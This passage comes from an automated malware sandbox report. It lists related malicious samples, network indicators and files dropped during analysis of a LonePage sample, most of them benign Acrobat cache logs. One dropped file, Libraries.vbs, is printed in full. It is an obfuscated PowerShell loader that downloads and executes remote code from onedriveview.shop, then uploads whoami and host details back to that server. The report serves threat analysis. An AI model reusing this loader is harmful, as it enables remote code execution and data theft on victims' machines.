                                                          23.41.168.139Advisory23-UCDMS04-11-01.pdf.lnkGet hashmaliciousUnknownBrowse
                                                            Callus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                                                              Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                https://seedsmarket.org/Get hashmaliciousHTMLPhisherBrowse
                                                                  1445321243TK.pdfGet hashmaliciousUnknownBrowse
                                                                    cho6043ijz.000Get hashmaliciousUnknownBrowse
                                                                      request_731.pdfGet hashmaliciousUnknownBrowse
                                                                        5ec990.msiGet hashmaliciousUnknownBrowse
                                                                          https://protect.checkpoint.com/v2/r02/___https:/clicktime.symantec.com/a/1/zPM8RRCBucIOtZGS7nBuCsGPfGeuu7uqRi7wib3E_aY=?d=NFaqzsVnaPxuUzxsp1S8ZNeTdv5RUAvfUpeVYxZKOFi_FaxMV9Y7SVV54XPcAAn6YB9QzZxIDYthMOs47JRBZ_0PV-GDVB9ATG93QO70LP8jR59aDk47QZTQk1MCrc9z0M3DqIE9FBr3JkLMrCK4n5QQgA808-LoV3aL3E5VEqB9qmOwHolNy2exhhpbmurcCABi5zh5uKgLe9rfjkQctCPzCg3AE4fvCR7U11tWATVxiJtbisJBMe_5iBhkTFjew3iq_3GEy8ZmD-34Perc98nMVcfrpi4VxTn2R85qX2fmxz3xMqJlfOHtVdD4mDJYHRlv2yYwpVXDDq31APFUszUTvBvOIHR3Pykkf75nE0oRo-IGsNY6JAjIXdEf9hc703INnKhyaOlaJqzSGk7sTDVPbYStXF2M5bSFRVWbiTwfxF2vjGvw-UOxN6lhQJBYgMpfIk92Omh-tbjm4_bTau0WyFvFbUBrukuGpdg%3D&u=http%3A%2F%2Fwww.globalindustrial.com%2F___.YzJlOmdlcmZsb3JzcGE6YzpvOjVjNDhlMDRlZTQ0YTE0ZTU3OTkxM2M3YTlmYTI1YmE4Ojc6NTQxYTpmMjVhNGFkOWJmNTc4NzRiYWUxZDE4NmIxZWVmYzYzZTI1YWI1YWJhOTNjY2IyMjY3ZjEyMTdhNjg1MjRmZGFkOmg6RjpOGet hashmaliciousUnknownBrowse
                                                                            Houghton closure form.pdfGet hashmaliciousUnknownBrowse

                                                                              Domains

                                                                              No context

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSXkci1BfrmX.lnkGet hashmaliciousLonePageBrowse
                                                                              • 188.114.97.3
                                                                              Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                              • 172.67.215.93
                                                                              https://tracking.groovesell.com:443/t/1c336171327d66d10a047ef8cbabb880Get hashmaliciousUnknownBrowse
                                                                              • 104.18.22.177
                                                                              3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              factura proforma .docx.docGet hashmaliciousRemcosBrowse
                                                                              • 172.67.216.244
                                                                              http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEqGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                              • 104.21.27.6
                                                                              https://techservealliance.orgGet hashmaliciousUnknownBrowse
                                                                              • 104.18.142.119
                                                                              SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.21.90.191
                                                                              https://cganet.com/Get hashmaliciousUnknownBrowse
                                                                              • 104.22.0.204
                                                                              ZAYO-6461USAdvisory23-UCDMS04-11-01.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              Callus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                                                                              • 23.41.168.139
                                                                              Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              https://seedsmarket.org/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 23.41.168.139
                                                                              1445321243TK.pdfGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              cho6043ijz.000Get hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              request_731.pdfGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              5ec990.msiGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              https://protect.checkpoint.com/v2/r02/___https:/clicktime.symantec.com/a/1/zPM8RRCBucIOtZGS7nBuCsGPfGeuu7uqRi7wib3E_aY=?d=NFaqzsVnaPxuUzxsp1S8ZNeTdv5RUAvfUpeVYxZKOFi_FaxMV9Y7SVV54XPcAAn6YB9QzZxIDYthMOs47JRBZ_0PV-GDVB9ATG93QO70LP8jR59aDk47QZTQk1MCrc9z0M3DqIE9FBr3JkLMrCK4n5QQgA808-LoV3aL3E5VEqB9qmOwHolNy2exhhpbmurcCABi5zh5uKgLe9rfjkQctCPzCg3AE4fvCR7U11tWATVxiJtbisJBMe_5iBhkTFjew3iq_3GEy8ZmD-34Perc98nMVcfrpi4VxTn2R85qX2fmxz3xMqJlfOHtVdD4mDJYHRlv2yYwpVXDDq31APFUszUTvBvOIHR3Pykkf75nE0oRo-IGsNY6JAjIXdEf9hc703INnKhyaOlaJqzSGk7sTDVPbYStXF2M5bSFRVWbiTwfxF2vjGvw-UOxN6lhQJBYgMpfIk92Omh-tbjm4_bTau0WyFvFbUBrukuGpdg%3D&u=http%3A%2F%2Fwww.globalindustrial.com%2F___.YzJlOmdlcmZsb3JzcGE6YzpvOjVjNDhlMDRlZTQ0YTE0ZTU3OTkxM2M3YTlmYTI1YmE4Ojc6NTQxYTpmMjVhNGFkOWJmNTc4NzRiYWUxZDE4NmIxZWVmYzYzZTI1YWI1YWJhOTNjY2IyMjY3ZjEyMTdhNjg1MjRmZGFkOmg6RjpOGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139
                                                                              Houghton closure form.pdfGet hashmaliciousUnknownBrowse
                                                                              • 23.41.168.139

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):0.35901589905449205
                                                                              Encrypted:false
                                                                              SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                                              MD5:7D48941DB05D2D1C9A0C52739933543F
                                                                              SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                                                                              SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                                                                              SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                                                                              Malicious:false
                                                                              Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.710710918251066
                                                                              Encrypted:false
                                                                              SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqI:2JIB/wUKUKQncEmYRTwh00
                                                                              MD5:A4A12F33EA8838E7DE050406C61C1E1C
                                                                              SHA1:3E3B9057CD522728046BFC89944B4EE6CAA6E404
                                                                              SHA-256:CE6ACFB95EDDB1AD9042B26F775CCDEBD5063549CA62925D7C479A61A56A9972
                                                                              SHA-512:D29D83EFD5B9AEC631B19BC66F43A1AC6BE9BAA3A3B12D4682315B4F041A74DF79F8E3A384C7B7407D24A6552E683CD5DEC3E1F4171BF0C7CE1941773DB9CD37
                                                                              Malicious:false
                                                                              Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb339d1f7, page size 16384, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.6651339904899999
                                                                              Encrypted:false
                                                                              SSDEEP:1536:dSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:dazaU+uroc2U5Si6
                                                                              MD5:B9593366356F178353E77AD5DAE40363
                                                                              SHA1:063CFAAEA9FFDB748E7F05DED217B42A85EC66E5
                                                                              SHA-256:F45CF11DE2CF26CC88A6D897383C21DCCFA6AB8C5B12D24FE4942E3ED66F12B0
                                                                              SHA-512:3BE447D9B34EA98C3E02E23D7FE4F0FF43D82238BA9996EEA0D083CA1A266F4AD1907703C511A2F0ABE395E5FE6ED338A6BF9F05A03B0044CB35BA387DED3678
                                                                              Malicious:false
                                                                              Preview:.9..... .......#.......X\...;...{......................0.e......(...|...%...|..h.b......(...|..0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................,...(...|..................U.BT.(...|...........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.08012974632319571
                                                                              Encrypted:false
                                                                              SSDEEP:3:9QgWtOetYeDNNmXltlli3Hy4M7ltllJnxHyltllollkqqG9lXlZOS:zyrzDNAXK3HyJ7XRxHyXAVr
                                                                              MD5:B86D99D14961CDD43832604055EE43B2
                                                                              SHA1:E7507FC1776A3739CFA409CF4731F4A9E4239B01
                                                                              SHA-256:A1F936B5A302344768172BB57152CC25E40FE9EB3B6A0D4EBE0D79ADD2BD210C
                                                                              SHA-512:8BDED9FF110C80354B12BC75F449E2B5C9AEBC0C1CD5CCB32C12E187B04BE7CFAA57F6248FE157482734193893C26BF270690C2118A4F4FD8197F4DA4A6EF9A2
                                                                              Malicious:false
                                                                              Preview:..u......................................;...{...%...|...(...|...........(...|...(...|....u..(...|..................U.BT.(...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\Public\Libraries\Libraries.vbs

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (842), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):909
                                                                              Entropy (8bit):5.411141970162526
                                                                              Encrypted:false
                                                                              SSDEEP:24:2jXxuqQZjZGbSBcV1oeoQVrL2/8xap7Uu73VoeW9:UhQdYbSBw1ojQVeEUp7J7loP
                                                                              MD5:529D1544CE8AA060D2AA1EB777B5482F
                                                                              SHA1:1ED490D4A983B8D3D03D4E4AB8022FBC258D5AE8
                                                                              SHA-256:B3913FF1ACFC55AC4EBFBFBFB910A00E3502541672D2F602EF7D9A56796F0012
                                                                              SHA-512:D5DABB4EF251EED2A99519A66DB74024EED598D6B8428E144D0920B8A018443790EF30538C8FCB3D92E0E9DC46D0EAA6224B56125EB95EEACFE97A8FE36A98CC
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: C:\Users\Public\Libraries\Libraries.vbs, Author: Joe Security
                                                                              Preview:dim r, c.set r = createobject("WScript.Shell").c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}".r.Run c, 0, false..

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):300
                                                                              Entropy (8bit):5.266707328884618
                                                                              Encrypted:false
                                                                              SSDEEP:6:PIue++WM+q2PcNwi2nKuAl9OmbnIFUt82IueXS11Zmw+2IueXvlWMVkwOcNwi2nC:PERL+vLZHAahFUt82EXSX/+2EX9LV54M
                                                                              MD5:8E88D5C99080244851989F56A3955E9B
                                                                              SHA1:69909081490417CF38C60217DDCE5EC998A2744E
                                                                              SHA-256:7A876E8F647D7B7144077CC9A44AEA163C8A0B2AFFCC526BCAF2F39878B99DE9
                                                                              SHA-512:F0F55EB2ED203D0FD761AACA98C254005F869DA5CAB4F11144B14FBA4CECD823BA5FB260725122E3E5E9C3084D7CFD09716E962695FAFB25772971AA327288F5
                                                                              Malicious:false
                                                                              Preview:2024/09/30-09:37:16.825 1dac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:37:16.828 1dac Recovering log #3.2024/09/30-09:37:16.829 1dac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):300
                                                                              Entropy (8bit):5.266707328884618
                                                                              Encrypted:false
                                                                              SSDEEP:6:PIue++WM+q2PcNwi2nKuAl9OmbnIFUt82IueXS11Zmw+2IueXvlWMVkwOcNwi2nC:PERL+vLZHAahFUt82EXSX/+2EX9LV54M
                                                                              MD5:8E88D5C99080244851989F56A3955E9B
                                                                              SHA1:69909081490417CF38C60217DDCE5EC998A2744E
                                                                              SHA-256:7A876E8F647D7B7144077CC9A44AEA163C8A0B2AFFCC526BCAF2F39878B99DE9
                                                                              SHA-512:F0F55EB2ED203D0FD761AACA98C254005F869DA5CAB4F11144B14FBA4CECD823BA5FB260725122E3E5E9C3084D7CFD09716E962695FAFB25772971AA327288F5
                                                                              Malicious:false
                                                                              Preview:2024/09/30-09:37:16.825 1dac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:37:16.828 1dac Recovering log #3.2024/09/30-09:37:16.829 1dac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):344
                                                                              Entropy (8bit):5.223738241327505
                                                                              Encrypted:false
                                                                              SSDEEP:6:PIueRqM+q2PcNwi2nKuAl9Ombzo2jMGIFUt82Iue0Zmw+2IueqMVkwOcNwi2nKuA:PE4M+vLZHAa8uFUt82E0/+2EqMV54ZHA
                                                                              MD5:7A193FA71806768EE291D91F260D7865
                                                                              SHA1:DF760F0BC7B7D49B1410227883FCB6517DB849DB
                                                                              SHA-256:A9A5717EED2C1E457D21587212F55A029E70CEE50E3797402D0A488D2A64C0B1
                                                                              SHA-512:3D4DDBD8BBDE3F6717DF6A55A418248914B4FCB3542F284C80E57A097A75C20AFDD55872DED2A29474F7C1AD3BF78B8A856FA181D9B54E8BC441F76E4235FFCB
                                                                              Malicious:false
                                                                              Preview:2024/09/30-09:37:16.993 1e8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:37:16.994 1e8c Recovering log #3.2024/09/30-09:37:16.995 1e8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):344
                                                                              Entropy (8bit):5.223738241327505
                                                                              Encrypted:false
                                                                              SSDEEP:6:PIueRqM+q2PcNwi2nKuAl9Ombzo2jMGIFUt82Iue0Zmw+2IueqMVkwOcNwi2nKuA:PE4M+vLZHAa8uFUt82E0/+2EqMV54ZHA
                                                                              MD5:7A193FA71806768EE291D91F260D7865
                                                                              SHA1:DF760F0BC7B7D49B1410227883FCB6517DB849DB
                                                                              SHA-256:A9A5717EED2C1E457D21587212F55A029E70CEE50E3797402D0A488D2A64C0B1
                                                                              SHA-512:3D4DDBD8BBDE3F6717DF6A55A418248914B4FCB3542F284C80E57A097A75C20AFDD55872DED2A29474F7C1AD3BF78B8A856FA181D9B54E8BC441F76E4235FFCB
                                                                              Malicious:false
                                                                              Preview:2024/09/30-09:37:16.993 1e8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:37:16.994 1e8c Recovering log #3.2024/09/30-09:37:16.995 1e8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6689adc7-4295-4e2d-9efe-085383a260a9.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:modified
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.970548621198367
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqn8HgXhsBdOg2Hd2caq3QYiubSpDyP7E4T3y:Y2sRdsi8HJdMHP3QYhbSpDa7nby
                                                                              MD5:8F93CFEF8CC3AFB34A47A9AE95B125CA
                                                                              SHA1:5FB346091BFA07F6978D7827F02D7E9C9428F711
                                                                              SHA-256:EC7BA0324E758F5CA5EA96E07465FF67A8E7A70FACCFA0192D8137AE46E3FCFB
                                                                              SHA-512:93E69DF2FA130EE1E724762EF38CA86D2E69E056DE3019B97C9D5934C6D96E6D631D391F69655B2B2B3990AE455637991D088C106C833A52EFA76AE9F161210F
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263447851544","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":299013},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\72c1950f-eb18-4c3d-ba2c-774aecc690ed.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.969814904260269
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                              MD5:7BE9C8316EB1B7252CB363207744A145
                                                                              SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                              SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                              SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.969814904260269
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                              MD5:7BE9C8316EB1B7252CB363207744A145
                                                                              SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                              SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                              SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF548a55.TMP (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):475
                                                                              Entropy (8bit):4.969814904260269
                                                                              Encrypted:false
                                                                              SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                                              MD5:7BE9C8316EB1B7252CB363207744A145
                                                                              SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                                              SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                                              SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                                              Malicious:false
                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4099
                                                                              Entropy (8bit):5.231594788030922
                                                                              Encrypted:false
                                                                              SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPl0E7wDj:CwNw1GHqPySfkcigoO3h28ytPl0gyj
                                                                              MD5:FD771723CF5C1097D55912B7F9688D72
                                                                              SHA1:2F2DEA4C10C3A893A6745A4D21143354D8C03230
                                                                              SHA-256:F6045A6AD47046558CA69B2DF959691692FFAEEE17EC9CF3589B97B077D51D05
                                                                              SHA-512:038FA60D770549A2DB933C549395BFD22E37502BF1D75C6FB60904F8CC816B3F63B3861A3DBD54F0FF5BC13682EF3A3537B607512054FA57EEDA5B42CCAA0736
                                                                              Malicious:false
                                                                              Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):332
                                                                              Entropy (8bit):5.233548262837074
                                                                              Encrypted:false
                                                                              SSDEEP:6:PIueS0pM+q2PcNwi2nKuAl9OmbzNMxIFUt82IueSJLXZmw+2IueStU2MVkwOcNw9:PE1pM+vLZHAa8jFUt82EyX/+2EWU2MVO
                                                                              MD5:7CA5FE1411C49AE242C071174114A5C2
                                                                              SHA1:F2B68E018ECC9EC1D615D72EAE4ABEE680A2FBBE
                                                                              SHA-256:7687F56BB690111A16B7CA865CAA8B3DA047A04ED7844172066CC5248BBD1D1D
                                                                              SHA-512:C42E01F77C041CE59B10B0BFA54C1CF4C748536ED87A432E6F9A75FFE093356307112F042676AA91EDD46B1957635FFB86BDE7B23F3CF0ADE1E9625F163BF8B2
                                                                              Malicious:false
                                                                              Preview:2024/09/30-09:37:17.461 1e8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:37:17.463 1e8c Recovering log #3.2024/09/30-09:37:17.464 1e8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):332
                                                                              Entropy (8bit):5.233548262837074
